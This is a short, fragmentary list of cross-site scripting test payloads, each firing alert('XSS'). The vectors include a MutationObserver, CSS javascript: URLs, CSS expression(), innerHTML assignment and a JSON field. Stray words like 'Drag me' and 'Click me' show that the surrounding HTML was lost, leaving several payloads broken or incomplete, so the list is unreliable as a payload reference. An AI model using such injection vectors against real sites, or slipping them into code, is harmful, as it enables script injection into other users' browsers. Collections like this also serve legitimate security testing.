Drag me
ws.send("alert('XSS')");
const observer = new MutationObserver(() => alert('XSS'));
observer.observe(document.body, { childList: true });
Click me
alert('XSS')
background: url("javascript:alert('XSS')");
var userInput = "alert('XSS')"; document.body.innerHTML = userInput; {"key": "alert('XSS')"} Click mebody { background: expression(alert('XSS')); }